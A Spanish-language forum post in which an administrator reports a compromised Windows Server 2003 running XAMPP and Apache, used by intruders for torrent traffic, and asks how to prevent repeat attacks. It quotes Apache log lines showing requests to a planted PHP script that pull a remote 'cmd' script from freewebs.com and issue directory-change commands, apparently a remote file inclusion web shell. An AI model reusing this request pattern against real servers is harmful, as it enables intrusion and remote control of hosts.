SERVER con windows web server 2003
con Xaamp y apache
hola, me han atacado el server. Al entrar pude ver como tenían control de las pantallas. Me di cuenta al aumentar el consumo de banda del server. lo usaban para peliculas torrent parece.
en apache en en el log he encontrado esto,
por si alguien sabe como evitar futuros ataques de esta forma:
201.39.152.75 - - [17/Feb/2009:19:52:38 +0100] "POST /candela/public/sintonias/SPOT%20NAVIDAD/smfp.php?http://freewebs.com/alezinn/cmd?&action=cmd&chdir=C:/WINDOWS/$NtUninstallKB935839_0$/spuninst/SysDir/ HTTP/1.1" 200 10444
201.39.152.75 - - [17/Feb/2009:18:54:50 +0100] "GET /candela/public/sintonias/SPOT%20NAVIDAD/smfp.php?
http://freewebs.com/alezinn/cmd?&chd....MPEG2-CtrlHD/ HTTP/1.1" 200 9413